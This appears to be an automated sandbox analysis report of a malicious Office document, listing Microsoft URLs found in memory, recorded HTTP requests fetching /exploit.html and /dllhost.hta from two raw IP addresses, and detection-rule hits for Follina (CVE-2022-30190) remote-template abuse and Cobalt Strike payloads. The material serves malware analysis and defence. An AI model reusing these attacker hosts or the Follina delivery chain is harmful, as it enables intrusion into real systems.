        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://config.edge.skype.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cortana.ai
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cortana.ai/api
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cr.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://dev.cortana.ai
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://devnull.onenote.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://directory.services.
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://enrichment.osi.office.net/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://graph.windows.net
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://graph.windows.net/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://invites.office.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://lifecycle.office.com
        Source: mshta.exe, 00000019.00000002.559463077.0000000000A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://login.windows.local
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://management.azure.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://management.azure.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://messaging.action.office.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://messaging.engagement.office.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://messaging.office.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://ncus.contentsync.
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://officeapps.live.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://onedrive.live.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://osi.office.net
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://otelrules.azureedge.net
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://outlook.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://outlook.office.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://outlook.office365.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://outlook.office365.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://roaming.edog.
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://settings.outlook.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://tasks.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://wus2.contentsync.
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: global trafficHTTP traffic detected: GET /exploit.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 101.33.231.81:62563Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /exploit.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 101.33.231.81:62563If-Modified-Since: Tue, 14 Jun 2022 15:37:10 GMT; length=5737Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dllhost.hta HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 159.75.135.162:61256Connection: Keep-Alive

        System Summary

        barindex
        Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
        Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
        Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
        Source: 00000019.00000003.506676110.000000000626D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499865318.0000000006E54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.498703501.000000000583F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500021102.0000000006E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500164196.0000000006E17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509313999.0000000005BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499436698.0000000006E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500090549.0000000006E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500504965.0000000006DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499684731.0000000006E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509423270.0000000005BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500246766.0000000006E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568757163.0000000006E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.505927561.000000000636D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500477251.0000000006DD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508961693.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500075794.0000000006E2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499611659.0000000006E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500491953.0000000006DD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499493418.0000000006E94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508307572.0000000005E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500524387.0000000006DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500409413.0000000006DE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
